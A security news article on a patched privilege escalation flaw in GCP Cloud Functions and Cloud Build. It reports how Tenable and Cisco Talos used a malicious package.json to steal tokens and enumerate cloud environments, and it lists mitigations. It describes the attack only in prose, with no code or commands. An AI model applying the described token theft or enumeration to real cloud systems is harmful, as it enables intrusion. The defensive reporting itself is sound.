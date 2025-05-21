A potential privilege escalation flaw affecting Google Cloud Platform (GCP) Cloud Functions and its Cloud Build service has been identified and investigated by security researchers.

The issue, initially discovered by Tenable Research, allowed attackers to exploit the deployment process of GCP Cloud Functions to gain elevated permissions.

Google has since issued a patch to mitigate the excessive privileges previously granted to default Cloud Build service accounts.

Attack Technique Repurposed Across Cloud Environments

Cisco Talos recently expanded upon Tenable’s findings by replicating the attack technique and testing its impact across multiple cloud platforms.

Researchers set up a Debian server in GCP with Node Package Manager (NPM) and Ngrok, using a malicious package.json file to extract tokens and simulate an attack. They confirmed that Google’s patch has neutralized the original privilege escalation vector.

However, Talos demonstrated that the same approach could be adapted to perform environment enumeration – a reconnaissance tactic useful for mapping systems – even without privileged access.

By deploying the altered package.json in AWS Lambda and Azure Functions, Talos verified the tactic’s broader applicability across cloud services.

Enumeration Techniques Observed

The research highlighted several enumeration methods attackers could use to gather valuable system and network information:

ICMP discovery for network mapping

Detection of .dockerenv files to confirm containerized environments

CPU scheduling checks to identify init systems

Container ID and mount point analysis for potential escape techniques

Operating system and kernel detail extraction

User and permission scans to aid privilege escalation

Network traffic analysis for vulnerability assessment

These techniques can be deployed without privileged credentials, making them viable in various scenarios where service accounts are correctly limited.

Google Responds and Mitigation Measures Advised

Following Tenable’s report, Google modified Cloud Build’s behavior and added new policies for more granular service account control. Talos verified that exfiltration of service account tokens using this method is no longer feasible in GCP.

To defend against similar threats, organizations are advised to:

Enforce the principle of least privilege for all service accounts

Regularly audit and monitor permissions

Alert on unexpected Cloud Function modifications

Inspect outgoing traffic for signs of exfiltration

Validate the integrity of external NPM packages

Though Google has addressed the original flaw, the research underscores the persistent risk posed by overly permissive configurations and the importance of continuous security monitoring across cloud environments.